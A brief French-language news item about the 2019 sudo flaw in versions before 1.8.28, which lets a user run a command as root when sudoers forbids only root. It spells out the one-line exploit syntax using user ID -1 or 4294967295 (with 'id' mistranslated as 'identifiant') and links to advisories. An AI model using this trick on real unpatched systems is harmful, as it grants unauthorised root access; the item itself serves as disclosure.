Un bug dans sudo permet d'exécuter n'importe quel fichier exécutable en tant que root si /etc/sudoers permet son exécution par d'autres utilisateurs et est interdit pour root.
L’exploitation de l’erreur est très simple :
sudo -u#-1 identifiant -u
ou:
sudo -u#4294967295 identifiant -u
L'erreur est présente dans toutes les versions de sudo avant la 1.8.28
Détails:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Source: linux.org.ru